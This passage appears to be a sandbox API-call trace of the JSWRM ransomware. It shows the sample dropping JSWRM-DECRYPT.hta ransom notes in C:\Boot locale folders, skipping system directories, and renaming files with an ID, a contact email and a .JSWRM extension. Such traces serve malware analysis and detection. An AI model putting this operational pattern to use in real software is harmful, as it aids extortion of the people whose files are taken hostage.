(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0064.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.294] CreateFileW (lpFileName="C:\\Boot\\sk-SK\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sk-sk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.294] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.294] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.295] CloseHandle (hObject=0x450) returned 1 [0064.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: hHeap=0x1e0000) returned 1 [0064.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236c78 [0064.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.296] GetFileAttributesW (lpFileName="C:\\Boot\\sk-SK\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sk-sk\\jswrm-decrypt.hta")) returned 0x20 [0064.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236c78 | out: hHeap=0x1e0000) returned 1 [0064.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.296] FindFirstFileW (in: lpFileName="C:\\Boot\\sk-SK\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cfbc821, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0064.297] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.297] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cfbc821, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.297] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.297] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.297] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.297] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.298] CreateFileW (lpFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.298] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.298] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.299] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.299] CloseHandle (hObject=0xffffffff) returned 1 [0064.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0064.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0064.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0064.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0064.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0064.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0064.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0064.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.300] MoveFileW (lpExistingFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\sk-SK\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0064.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.300] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfbc821, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cfbc821, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cfbc821, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.300] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.301] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfbc821, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cfbc821, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cfbc821, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.301] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0064.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.301] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2=".") returned 1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2="..") returned 1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2="...") returned 1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2="windows") returned -1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2="recovery") returned 1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2="perflogs") returned 1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2="documents and settings") returned 1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2="$RECYCLE.BIN") returned 1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2="system volume information") returned -1 [0064.301] lstrcmpiW (lpString1="sl-SI", lpString2="msocache") returned 1 [0064.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0064.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.301] GetFileAttributesW (lpFileName="C:\\Boot\\sl-SI\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sl-si\\jswrm-decrypt.hta")) returned 0xffffffff [0064.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0064.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0064.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0064.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.302] CreateFileW (lpFileName="C:\\Boot\\sl-SI\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sl-si\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.303] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.303] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.304] CloseHandle (hObject=0x450) returned 1 [0064.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: hHeap=0x1e0000) returned 1 [0064.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0064.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373f8 [0064.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.305] GetFileAttributesW (lpFileName="C:\\Boot\\sl-SI\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sl-si\\jswrm-decrypt.hta")) returned 0x20 [0064.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373f8 | out: hHeap=0x1e0000) returned 1 [0064.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.306] FindFirstFileW (in: lpFileName="C:\\Boot\\sl-SI\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cfe2abf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0064.306] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.306] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1cfe2abf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.306] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.306] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.306] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.306] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.307] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 